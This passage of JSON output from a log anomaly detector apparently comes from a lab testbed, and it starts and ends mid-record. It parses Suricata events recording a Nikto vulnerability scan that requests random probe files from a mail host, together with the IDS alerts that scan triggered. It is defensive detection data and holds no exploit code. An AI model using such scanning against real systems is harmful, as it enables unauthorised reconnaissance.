(Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 
(Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.bas:ShowVolume\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.bas:ShowVolume\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.bas:ShowVolume", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.bas:ShowVolume", "/parser/model/event_type/fileinfo/http/http_user_agent_str": 
"\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46934, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":135802554818065,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 135802554818065, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.337148+0000\",\"flow_id\":135802554818065,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", 
"AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.341111 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46936 -> 192.168.10.154:80", "/parser/model/time": 1583349514.341111, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46936, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.341111 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46936 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", 
"/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sqlite", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.342355+0000\",\"flow_id\":630883435031917,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.342355, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":630883435031917,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sqlite\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sqlite\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sqlite", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 
"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sqlite", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46936, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":630883435031917,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 630883435031917, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.342355+0000\",\"flow_id\":630883435031917,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.343787 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46938 -> 192.168.10.154:80", "/parser/model/time": 1583349514.343787, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46938, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.343787 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46938 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ncf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.343942+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.343942, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2066313044966357,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ncf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ncf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ncf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ncf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46938, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2066313044966357,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2066313044966357, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.343942+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.345338 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46940 -> 192.168.10.154:80", "/parser/model/time": 1583349514.345338, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46940, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.345338 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46940 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
